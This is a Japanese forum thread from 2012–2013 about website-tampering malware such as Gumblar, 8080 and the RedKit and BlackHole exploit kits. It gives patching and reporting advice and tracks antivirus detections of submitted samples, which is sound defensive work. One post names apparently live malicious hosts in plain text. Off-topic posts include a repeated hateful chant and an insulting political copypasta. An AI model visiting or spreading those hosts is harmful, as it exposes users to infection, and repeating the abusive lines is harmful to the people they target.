12/08/14 12:41:21.97 BE:4628902289-PLT(31018).net
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
前スレ
【Gumblar/GENO】Web改竄ウイルス総合10【8080】
スレリンク(sec板)
2:名無しさん@お腹いっぱい。
12/08/14 12:42:09.51 .net
Gumblar(.x)、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)~(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
3:名無しさん@お腹いっぱい。
12/08/14 12:42:25.57 .net
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
URLリンク(get.adobe.com)
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
URLリンク(get.adobe.com)
URLリンク(www.adobe.com)
・Flash Playerのバージョン確認
URLリンク(www.adobe.com)
URLリンク(www.adobe.com)
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
URLリンク(www.adobe.com)
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
URLリンク(www.java.com)
・Javaのバージョン確認
URLリンク(www.java.com)
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
URLリンク(www.apple.com)
■ RealPlayerを更新 (使っていないならアンインストール)
URLリンク(jp.real.com)
4:名無しさん@お腹いっぱい。
12/08/14 12:42:39.25 .net
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
5:名無しさん@お腹いっぱい。
12/08/14 12:42:53.38 .net
ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
URLリンク(www.gred.jp)
・aguse
URLリンク(www.aguse.net)
・WebGetter
URLリンク(rd.or.tp)
・Dan's View Source
URLリンク(www.dan.co.uk)
・飛び先のチェック by ぴょん基地の友達
URLリンク(www.kakiko.com)
6:名無しさん@お腹いっぱい。
12/08/14 12:43:06.85 .net
改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。
■インシデント報告の届出(JPCERT/CC)
URLリンク(www.jpcert.or.jp)
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック URLリンク(www.value-domain.com)
OCN URLリンク(www.ocn.ne.jp)
さくら URLリンク(secure.sakura.ad.jp)
ロリポップ URLリンク(lolipop.jp)
GMOインターネットグループ URLリンク(secure.gmo.jp)
インフォシーク (isweb) URLリンク(portal.faq.rakuten.co.jp)
DION URLリンク(www.auone-net.jp)
NTTPCコミュニケーションズ URLリンク(www.nttpc.ne.jp)
ODN URLリンク(www.odn.ne.jp)
xserver (株式会社ベット) URLリンク(www.xserver.ne.jp)
heteml ヘテムル URLリンク(secure.heteml.jp)
ファーストサーバ URLリンク(www.firstserver.co.jp)
エキサイト URLリンク(www.excite.co.jp)
7:名無しさん@お腹いっぱい。
12/08/14 12:43:27.37 .net
改竄を受けたら
ウイルス・不正アクセス届出状況について(3月分および第1四半期)
URLリンク(www.ipa.go.jp)
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
URLリンク(www.ipa.go.jp)
8:名無しさん@お腹いっぱい。
12/08/14 12:43:46.37 .net
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
URLリンク(www.geocities.jp)
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=URLリンク(www.aguse.net)
飛び先のチェック=URLリンク(www.kakiko.com)
WebGetterでソースを見る=URLリンク(rd.or.tp)
WebGetterでタグを除去してソースを見る=URLリンク(rd.or.tp)
WebGetterでリンクを抽出する=URLリンク(rd.or.tp)
Dan's View Sourcelでソースを見る=URLリンク(www.dan.co.uk)
Dr.WEB=URLリンク(online.drweb.com)
9:名無しさん@お腹いっぱい。
12/08/14 19:03:59.99 .net
>>8
WebGetterのドメインが変更になったもよう。
rd.or.tp → rd.or.tl
10:名無しさん@お腹いっぱい。
12/09/23 20:55:28.32 .net
.
11:名無しさん@お腹いっぱい。
12/10/10 16:24:17.14 .net
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
12:名無しさん@お腹いっぱい。
12/10/30 18:56:14.77 .net
天麩羅以外殆どレスがついてないな。平穏で何より。
13:名無しさん@お腹いっぱい。
12/11/15 20:00:07.47 .net
さらみ復帰かきこ
14:名無しさん@お腹いっぱい。
12/11/28 22:48:45.00 .net
「Adobe Reader」の「サンドボックス」を回避する脆弱性はなぜ危険か(トレンドマイクロ)
scan.netsecurity.ne.jp/article/2012/11/28/30520.html
>このエクスプロイトは、JavaScriptがソフトウェア上で無効になっている場合でも実行される。
>ユーザが必要とされる唯一のやりとりは、PDFファイルを開き、Webブラウザを閉じるだけで、
>それだけで脆弱性が悪用される。
15:/名無しさん[1-30] ◆.htmlint.U
12/12/19 20:42:32.31 .net
「ITSOKNOPROBLEMBRO」
It's OK no problem bro.
「bro」って、なんじゃろ?
16:名無しさん@お腹いっぱい。
13/01/23 18:38:57.70 .net
JPドメイン Web改竄速報
URLリンク(izumino.jp)
17:/名無しさん[1-30] ◆.htmlint.U
13/01/24 03:49:01.61 .net
いろんなCMSがあるのね
ぱっと見、Joomla! 1.5が多いなん
「Joomla!」ってのはLTSが2.5で、まいなうpだてJoomla! 2.5.8になってるね
トップページにMETA HTTP-EQUIV="Refresh"~仕込まれてるとこがあるる
こりは故意にやってるのかどーかわかんね
どーすべさ
18:/名無しさん[1-30] ◆.htmlint.U
13/01/27 02:05:20.13 .net
>< ;
> このメールにはご注意ください。送信者のアカウントが不正に使用されている可能性があるため、このメールは個人情報を騙し取ろうとする詐欺である可能性があります。
ぁぅぁぅぁー
検体8080を送ったら、ベンダーからの返信がみーんなこーなってた…
って、ことは改竄サイトのホスティングにはつーほーめる届いてないかもん
19:名無しさん@お腹いっぱい。
13/01/28 11:04:36.25 .net
[Google セーフ ブラウジング診断ページ: microad.jp]
URLリンク(www.google.com)
microad.jp は、過去 90 日間に 21 個のサイト(www34.atwiki.jp/no1mixisagi/, www16.atwiki.jp/godeaterburst-wiki/, soccer-douga.com/ など)への感染媒体となっていた形跡があります。
20:/名無しさん[1-30] ◆.htmlint.U
13/02/28 17:25:53.64 .net
RedKit Redirector Injected into Legitimate JavaScript Code | Xanda's Blog !~!
URLリンク(blog.xanda.org)
マルウエア被害の実例と対策について || Joomla日本語コラム
URLリンク(www.joomla.jpn.com)
マカフィー株式会社 | McAfee Blog - 最新のエクスプロイトキット、Red Kit
URLリンク(www.mcafee.com)
CMS以外のサイトもパパンがパンデミック
こうしてる合間にもまかひはEXTRA.DATを生産中
ひげおじさんもあびらもまいくろそふともがむばってます
21:名無しさん@お腹いっぱい。
13/03/09 23:22:58.95 .net
RedKitリダイレクターけっこう多いよね (´ω`)
RedKit設置されてるサーバー
ぜんぶ正規のサイトだもんだからイヤラシイことこの上ない
22:/名無しさん[1-30] ◆.htmlint.U
13/03/12 19:21:28.73 .net
ESET参戦
> Dear ○○,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> *********_ahhd.htm_i.txt - JS/Exploit.Agent.NEN trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
>
> Regards,
>
> ESET Malware Response Team
>>21
もうね、どーしよーもにゃー
検体送付とつーほーがワンセット サンセット イーセット
(-Д-) サムイネェ
23:/名無しさん[1-30] ◆.htmlint.U
13/03/13 18:34:27.64 .net
>>20
> Hello,
>
> The files sent to us could be allocated to the following malware families:
>
> - EXP/Pidief.dtd
> - JS/Dldr.Agent.ahi
>
> The detections and repair routines of the malware samples will be available prospective with one of next update of the VDF.
>
> Best regards,
> Avira Sdn Bhd
うほ
24:/名無しさん[1-30] ◆.htmlint.U
13/03/15 04:54:10.50 .net
>>20のマカフィーが説明しているRedKitの中間Scriptが単純化したのを確認すた。。。しかも相対パスだぼ
現状、呼び出されるjar(exe)で検出されるのを待つしかにゃー
jar(exe)の進捗状況
Detection ratio: 6 / 45
Analysis date: 2013-03-14 12:13:28 UTC
↓
Detection ratio: 11 / 45
Analysis date: 2013-03-14 18:21:34 UTC
Analysis
Antivirus Result Update
DrWeb Trojan.DownLoader8.5817 20130314
Emsisoft Trojan.Win32.Agent.AMN (A) 20130314
Fortinet W32/Yakes.B!tr 20130314
Ikarus Trojan-Downloader.Win32.Karagany 20130314
Kaspersky UDS:DangerousObject.Multi.Generic 20130314
Malwarebytes Trojan.Agent.BVGen 20130314
McAfee PWS-FAQO!C7C63B63204E 20130314
Panda Suspicious file 20130314
TheHacker Posible_Worm32 20130314
TrendMicro PAK_Generic.001 20130314
TrendMicro-HouseCall TROJ_GEN.RC1H1CE 20130314
検出できないかもしれない中間Scriptとjar(exe)をメルで送れるベンダーに検体提出しました。
25:名無しさん@お腹いっぱい。
13/03/18 02:36:23.26 .net
国内Webサーバの大規模改ざん発生中。アクセスすると別サイトから自動的にマルウェアダウンロード
スレリンク(poverty板)
26:名無しさん@お腹いっぱい。
13/03/18 12:58:33.77 .net
国内Webサーバの大規模改ざん発生age
27:名無しさん@お腹いっぱい。
13/03/18 17:21:15.82 .net
【社会】環境省サイトが改ざんされる…閲覧者がウイルス感染する危険も
uni.2ch.net/test/read.cgi/newsplus/1363506806/
環境省に聞いてみました
改ざんされてると分かったのはなぜ?
ゼロデイ・ジャパン(0day.jp) | セキュリティ&マルウェア研究所
0day.jp/
↑
ここで告知されていたからとのこと
28:名無しさん@お腹いっぱい。
13/03/18 18:05:15.24 .net
924 :名無しさん@お腹いっぱい。:2013/03/18(月) 16:11:10.81
環境省サイト改ざんウイルス
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
29:名無しさん@お腹いっぱい。
13/03/18 22:30:42.35 .net
■NSX GT-ONE GT-ROM.NET
www●gt-rom●net/
>このサイトはコンピュータに損害を与える可能性があります。
30:名無しさん@お腹いっぱい。
13/03/18 23:38:43.30 .net
>>24
EXEのダウンロードパスが固定数値からランダム数値に切り替わってるね
xxxx.htm
yyy.jar
??.html ← EXEが入手できん! (´ω`)
>>29
改竄されてて
最終的にCridexというマルウェアの感染となーる
31:/名無しさん[1-30] ◆.htmlint.U
13/03/19 12:27:04.71 .net
ぅほっ
一日見ない間になんかすごいことに
>>25-28
リストが多くて挫折したのさ。。。orz....
>>29
アッー
>>30
やっぱランダムだたのね
>24以後、DLできなくなたー
決め打ちもできんくなたー
32:名無しさん@お腹いっぱい。
13/03/19 18:36:24.53 .net
感染サイト一覧
unixfreaxjp.blogspot.jp/2013/03/ocjp-098-285blackhole-exploit-kit.html
つまり、周知キャンペーンw
33:名無しさん@お腹いっぱい。
13/03/19 18:48:05.28 .net
<愛国者とネトウヨの11の違い>
理路整然と意見を話すのが愛国者 出所不明な怪文書を貼るのがネトウヨ
有識で周りの評価が高いのが愛国者 無職でプライドだけ高いのがネトウヨ
日本人である事を誇りに思うのが愛国者 日本人である事だけが誇りなのがネトウヨ
討論で相手の愛国度をはかるのが愛国者 討論で相手を売国奴扱いするのがネトウヨ
君が代をきちんと歌えるのが愛国者 気味が悪いほどネットで吠えるのがネトウヨ
家族思いなのが愛国者 家族の重荷になっているのがネトウヨ
社会に出て一人前なのが愛国者 2ちゃんねるでだけ一人前なのがネトウヨ
日本の歴史と政治に学が深いのが愛国者 2ちゃんの書き込みとレスが不快なのがネトウヨ
日本人が逮捕されると残念だと嘆くのが愛国者 日本人が逮捕されると通名だとわめくのがネトウヨ
日本の事を敬虔(けいけん)に思っているのが愛国者 自分の事を聖戦士だと思っているのがネトウヨ
投票で清き一票を入れるのが愛国者 妄想でキモい文章を作るのがネトウヨ
34:名無しさん@お腹いっぱい。
13/03/19 18:59:38.91 .net
私は
一庶民
カスミソウの様に
密やかに
35:/名無しさん[1-30] ◆.htmlint.U
13/03/19 22:51:36.29 .net
>29 VTで検出されるよーになたー
難読化されたScript
BitDefender JS:Trojan.Crypt.MF
F-Secure JS:Trojan.Crypt.MF
GData JS:Trojan.Crypt.MF
Ikarus Exploit.JS.Blacole
MicroWorld-eScan JS:Trojan.Crypt.MF
nProtect JS:Trojan.Crypt.MF
呼び先のphp
Microsoft Exploit:JS/Blacole.GB
Sophos Mal/ExpJS-N
こっからさきは逝けんかった
ESETとひげおぢさんからめる
ESET
JS/Kryptik.AII trojan
JS/Kryptik.AIK trojan
JS/Exploit.Agent.NEO trojan
ひげおぢさん
Trojan-Downloader.JS.DarDuk.lb
CsideNet様から受領のお返事来てました。
VTとかが反応してきたので対応されるかと思ふぽ
頻繁に更新してるようですが
ドメインがSPAM扱いされてるようになったみたいで、検体メルで送り辛い ><;
36:名無しさん@お腹いっぱい。
13/03/19 23:16:40.31 .net
あげ
37:/名無しさん[1-30] ◆.htmlint.U
13/03/19 23:17:14.39 .net
あびらからもきてた>35
JS/Expy.B~F
38:名無しさん@お腹いっぱい。
13/03/20 05:36:32.81 .net
>>35
乙でし。
>Last-Modified: Tue, 19 Mar 2013 12:42:23 GMT
>Last-Modified: Tue, 19 Mar 2013 13:27:15 GMT
凄い勢いで更新?
※電話がボボンで代行依頼 orz ありがとう代行さん...
39:/名無しさん[1-30] ◆.htmlint.U
13/03/20 10:28:12.53 .net
>>38
お疲れ様です
4種類ぐらいのScriptが繰り返し交互に変わっているようです
happy-lemon、apmsolucionesweb、speciaalaangepast、vedelaar
んでそれぞれさらに違うとこへ誘導
ipodのとこには古い8080が(ry
40:名無しさん@お腹いっぱい。
13/03/30 14:13:02.89 .net
ぼぼん解除てすt
41:/名無しさん[1-30] ◆.htmlint.U
13/04/02 13:51:31.47 .net
>>24のRedKitの中間Scriptが難読化した
現状まかひのみ対応
File type: HTML
Detection ratio: 2 / 46
McAfee Exploit-Rekit.f 20130402
McAfee-GW-Edition Exploit-Rekit.f 20130402
42:/名無しさん[1-30] ◆.htmlint.U
13/04/08 06:13:13.78 .net
Exploit Kit が設置されてたはずのサイトへ逝ってみた
トップページには
> Hacked By CompLeXx* & XIX
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
43:名無しさん@お腹いっぱい。
13/04/12 12:04:59.79 .net
Trojan-Downloader.Win32.Karagany
新KwバルスECM:
90 34 00 00 21 00 17 02 0d ee 0c 56 5d 8a 9a 88 20 3c 69 26 e0 70 c0 dc 5c 04 15 de c8 a2 9f 0d be 5a 1b d8 e1 98 00
timeta70bledeva.rr.nu
URLリンク(www.virustotal.com)
Mal/HTMLGen-A
n8vlzd5e9h.diipl.com
URLリンク(www.virustotal.com)
Mal/HTMLGen-A
URLリンク(www.virustotal.com)
ESET Malware site
Google Safebrowsing Malware site
44:名無しさん@お腹いっぱい。
13/04/12 12:09:59.04 .net
Google セーフ ブラウジング
このサイトは危険にさらされている可能性があります
URLリンク(www.stopforumspam.)<)
45:/名無しさん[1-30] ◆.htmlint.U
13/04/14 12:17:59.97 .net
BlackHole Exploit Kit Redirectorだと思うけど
ランダムにExploit Kitサイトや金融系っぽいサイトに飛ばされるので新手のフィッシングかと思ってたら
自分でも知ってるbloombergにも逝っちゃた
どうやらノーマルなサイトと混ぜて飛ばされるみたい
金融系の末尾あたりに付く「LBTG」ってなんじゃろか?
株価チャートのことかなん
46:/名無しさん[1-30] ◆.htmlint.U
13/04/14 23:58:34.38 .net
>>45の亜種
ひげおぢさんから自動お返事の件名「[!!Spam KSE]Re: ~」
途中誘導されてるとこの一つのアドレスが薬物(Viagra等)販売サイトなのでこーなった…
他のベンダーに届いているのか心配
>>45との共通点
:タグの文字列
:難読Script デコードめんどいからaguse最高(´∇`) gredでも確認でけるYO
:誘導先に金融系サイトが混ざっている模様。恐らく検出逃れかと
47:/名無しさん[1-30] ◆.htmlint.U
13/04/15 14:55:31.76 .net
>>45
BitDefender Trojan.JS.Iframe.DDE 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
48:/名無しさん[1-30] ◆.htmlint.U
13/04/15 20:39:09.74 .net
>>45
別件だけど関連
スレリンク(sec板:822番)
49:/名無しさん[1-30] ◆.htmlint.U
13/04/16 02:25:53.84 .net
>>47
Antivirus Result Update
BitDefender Trojan.JS.Iframe.DDE 20130415
DrWeb JS.IFrame.418 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
Ikarus Trojan.JS.IFrame 20130415
Microsoft Trojan:JS/BlacoleRef.DD 20130415
MicroWorld-eScan Trojan.JS.Iframe.DDE 20130415
nProtect Trojan.JS.Iframe.DDE 20130415
TrendMicro-HouseCall TROJ_GEN.F47V0415 20130415
これくらい検出されれば、改竄されたことに気付くかなん
50:/名無しさん[1-30] ◆.htmlint.U
13/04/16 21:39:57.38 .net
>>46
BitDefender Trojan.Script.CDK 20130416
Commtouch JS/IFrame.RS 20130416
DrWeb JS.IFrame.418 20130416
Emsisoft Trojan.Script.CDK (B) 20130416
F-Prot JS/IFrame.RS 20130416
F-Secure Trojan.Script.CDK 20130416
GData Trojan.Script.CDK 20130416
Microsoft Trojan:JS/BlacoleRef.CZ 20130416
MicroWorld-eScan Trojan.Script.CDK 20130416
nProtect Trojan.Script.CDK 20130416
Sophos Mal/Iframe-AO 20130416
TrendMicro-HouseCall TROJ_GEN.F47V0414 20130416
51:/名無しさん[1-30] ◆.htmlint.U
13/04/17 00:06:12.77 .net
>>49
Avira
JS/Iframe.CI
HTML/Iframe.CN
JS/Iframe.CL
52:/名無しさん[1-30] ◆.htmlint.U
13/04/17 05:57:18.69 .net
>>45
また変わった
パパンがパンデミック
DrWeb JS.IFrame.418 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
中間Script
McAfee Exploit-Rekit.f 20130416
Norman RedKit.B 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
BlackHoleもRedKitも同じ中間Scriptになったのかな? > Norman
53:/名無しさん[1-30] ◆.htmlint.U
13/04/18 00:11:44.19 .net
>>52増えた
BitDefender Trojan.JS.Agent.IYS 20130417
Commtouch JS/IFrame.RS.gen 20130417
DrWeb JS.IFrame.418 20130417
Emsisoft Trojan.JS.Agent.IYS (B) 20130417
F-Prot JS/IFrame.RS.gen 20130417
F-Secure Trojan.JS.Agent.IYS 20130417
GData Trojan.JS.Agent.IYS 20130417
Ikarus Trojan.JS.BlacoleRef 20130417
McAfee JS/Blacole-Redirect.aa 20130417
Microsoft Trojan:JS/BlacoleRef.DD 20130417
MicroWorld-eScan Trojan.JS.Agent.IYS 20130417
Norman Blacole.TB 20130417
nProtect Trojan.JS.Agent.IYS 20130417
TrendMicro-HouseCall TROJ_GEN.F47V0416 20130417
確認できてから三度改竄されてるけど
どんなセキュリティソフト使ってんだろ?
Fxやちょろめ、ぐぐるを使わないんだろか?
孫やほーだと警告でにゃーし
とっくの昔に直接めるしてるし
NTTPCコミュニケーションズからも通達されてるはずなんだけど。。。
ドメインがスパムとかに登録されちゃってるのかな?
Wab上での機会損失関係ない企業なぬか?
ついったーやってるっぽいんだけどにゃー
ひょっとして蜜壷?
54:/名無しさん[1-30] ◆.htmlint.U
13/04/18 14:01:29.46 .net
>>53
四度目
AntiVir JS/BlacoleRef.CZ.7 20130418
Commtouch JS/IFrame.RS.gen 20130418
DrWeb JS.IFrame.418 20130418
F-Prot JS/IFrame.RS.gen 20130418
Ikarus Trojan.JS.IFrame 20130418
McAfee JS/Blacole-Redirect.aa 20130418
Microsoft Trojan:JS/BlacoleRef.DD 20130418
Norman Blacole.TB 20130417
つーほーめる届いてなくても
いーかげん気付かないかなん
55:/名無しさん[1-30] ◆.htmlint.U
13/04/19 23:48:47.87 .net
>>54
五度目
AntiVir JS/BlacoleRef.CZ.7 20130419
BitDefender Trojan.Script.CDS 20130419
Commtouch JS/IFrame.RS.gen 20130419
DrWeb JS.IFrame.418 20130419
Emsisoft Trojan.Script.CDS (B) 20130419
F-Prot JS/IFrame.RS.gen 20130418
F-Secure Trojan.Script.CDS 20130419
GData Trojan.Script.CDS 20130419
Ikarus Trojan.JS.IFrame 20130419
McAfee JS/Blacole-Redirect.aa 20130419
McAfee-GW-Edition JS/Blacole-Redirect.aa 20130419
Microsoft Trojan:JS/BlacoleRef.DD 20130419
MicroWorld-eScan Trojan.Script.CDS 20130419
Norman Blacole.TB 20130419
nProtect Trojan.Script.CDS 20130419
もうベンダーに送る気力がにゃい
56:/名無しさん[1-30] ◆.htmlint.U
13/04/20 00:41:15.72 .net
こりもころころ変わるっぽい>中間Script
Sophos Troj/ExpJS-II 20130419
55ひっくるめて送った>ベンダー
57:/名無しさん[1-30] ◆.htmlint.U
13/04/22 01:37:02.84 .net
>>55
七度目
Detection ratio: 2 / 46
Analysis date: 2013-04-21 16:31:34 UTC
Antivirus Result Update
McAfee JS/Exploit-Blacole.ht 20130421
Norman Blacole.TH 20130421
六度目は>>47>>49とおなじものですた
58:/名無しさん[1-30] ◆.htmlint.U
13/04/22 02:54:43.86 .net
中間Script >>57
久しぶりにひげおじさん登場
Detection ratio: 18 / 46
Analysis date: 2013-04-21 17:25:00 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.7 20130421
BitDefender Trojan.JS.Agent.IYT 20130421
Commtouch JS/IFrame.RS.gen 20130420
Comodo UnclassifiedMalware 20130421
DrWeb JS.IFrame.418 20130421
Emsisoft Trojan.JS.Agent.IYT (B) 20130421
F-Prot JS/IFrame.RS.gen 20130420
F-Secure Trojan.JS.Agent.IYT 20130421
Fortinet JS/Agent.GWA!tr.dldr 20130421
GData Trojan.JS.Agent.IYT 20130421
Ikarus Trojan.JS.IFrame 20130421
Kaspersky Trojan-Downloader.JS.Agent.gwa 20130421
McAfee JS/Exploit-Blacole.eu 20130421
McAfee-GW-Edition JS/Exploit-Blacole.eu 20130421
Microsoft Trojan:JS/BlacoleRef.DD 20130421
Norman Blacole.TB 20130421
nProtect Trojan.JS.Agent.IYT 20130421
TrendMicro-HouseCall TROJ_GEN.F47V0420 20130421
単純化しちゃったのがまた出た
Detection ratio: 0 / 46
Analysis date: 2013-04-21 17:15:56 UTC
ねもい
59:/名無しさん[1-30] ◆.htmlint.U
13/04/22 03:12:33.02 .net
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
スパムとかのドメインがあったもより
まかひには送れない
60:/名無しさん[1-30] ◆.htmlint.U
13/04/23 14:26:12.52 .net
>>57
八回目…
Detection ratio: 6 / 46
Analysis date: 2013-04-23 04:15:16 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.8 20130423
DrWeb Exploit.BlackHole.182 20130423
McAfee JS/Exploit-Blacole.ht 20130423
NANO-Antivirus Trojan.Script.IFrame.bohxwi 20130423
Norman Blacole.TH 20130422
VIPRE Trojan.JS.Obfuscator.aa (v) 20130423
61:/名無しさん[1-30] ◆.htmlint.U
13/04/23 21:09:58.48 .net
> Dear *****,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> Regards,
>
> ESET Malware Response Team
いつもごめんよぉー
肝心の大ボス捕まえられなくて
62:/名無しさん[1-30] ◆.htmlint.U
13/04/25 01:32:09.03 .net
これまで蜜壷状態だったとこが正常になった模様です。
お疲れ様でした。
定点観測おはり
63:/名無しさん[1-30] ◆.htmlint.U
13/04/29 03:13:32.91 BE:1572252-BRZ(10111).net
こんな夜中にGMOの中の人が受理してくれました>インシデント
ゴールデンなウィークですがお疲れ様です。
ありがとうございます。
この場を借りてお礼申し上げます。
64:/名無しさん[1-30] ◆.htmlint.U
13/05/05 09:34:58.21 .net
一回目
AntiVir JS/BlacoleRef.CZ.12 20130503
Avast JS:Decode-ADH [Trj] 20130504
GData JS:Decode-ADH 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
二回目
AntiVir JS/BlacoleRef.CZ.12 20130504
Avast JS:Decode-ADH [Trj] 20130504
BitDefender Trojan.JS.Iframe.DDQ 20130504
Emsisoft Trojan.JS.Iframe.DDQ (B) 20130504
F-Secure Trojan.JS.Iframe.DDQ 20130504
GData Trojan.JS.Iframe.DDQ 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
MicroWorld-eScan Trojan.JS.Iframe.DDQ 20130504
nProtect Trojan.JS.Iframe.DDQ 20130504
三回目
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
Script更新して殆どのベンダー半日もたんかった
てーてんかんそくなぬか
サイトの対応は早くても明後日、火曜日以降になるんだろーな
65:/名無しさん[1-30] ◆.htmlint.U
13/05/06 04:35:47.16 .net
>>64
> 三回目
増えた
BitDefender Trojan.JS.Iframe.DDT 20130505
Comodo UnclassifiedMalware 20130505
Emsisoft Trojan.JS.Iframe.DDT (B) 20130505
F-Secure Trojan.JS.Iframe.DDT 20130505
GData Trojan.JS.Iframe.DDT 20130505
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130505
